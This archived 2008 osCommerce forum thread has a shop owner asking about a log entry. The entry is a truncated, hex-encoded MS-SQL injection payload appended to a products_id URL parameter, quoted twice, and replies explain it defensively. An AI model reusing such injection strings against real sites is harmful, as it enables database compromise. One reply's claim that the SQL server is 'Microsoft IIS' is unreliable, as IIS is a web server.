Brian-Bear Posted October 13, 2008 Share Posted October 13, 2008 I have seen this in my last urls list and looks a bit nasty. What are they trying to do? product_info.php?products_id=1649;DECLARE%20@S%20CHAR(4000);SET%20@S=CAST(0x4445434C415245204054207661726368617228323535292C40432076617263686172 283430303029204445434C415245205461626C655F437572736F7220435552534F5220464F522073 6 56C6563742061 any ideas Link to comment Share on other sites More sharing options...
Guest Posted October 13, 2008 Share Posted October 13, 2008 I can't say what it's trying but I'd agree that it looks a little suspicious and more than just spam. Link to comment Share on other sites More sharing options...
failsafe Posted October 13, 2008 Share Posted October 13, 2008 I have seen this in my last urls list and looks a bit nasty. What are they trying to do? product_info.php?products_id=1649;DECLARE%20@S%20CHAR(4000);SET%20@S=CAST(0x4445434C415245204054207661726368617228323535292... any ideas Well it appears to be an IIS / ms-sql injection attack. Looks like you only need to worry about it if your SQL server is Microsoft IIS. Since we're using mySQL for osCommerce (and not ms-sql) then no worries, other than the pain of seeing the request in your logs and the extra bandwidth it generates! :) If you put "CHAR(4000) injection attack" into Google you can find out about it. Link to comment Share on other sites More sharing options...
Brian-Bear Posted October 13, 2008 Author Share Posted October 13, 2008 Thanks for the heads up guys. Link to comment Share on other sites More sharing options...
php_Guy Posted October 14, 2008 Share Posted October 14, 2008 Install the Security Mods and they won't be able to attempt that sort of attack any longer. Link to comment Share on other sites More sharing options...
New 
Recommended Posts
Archived
This topic is now archived and is closed to further replies.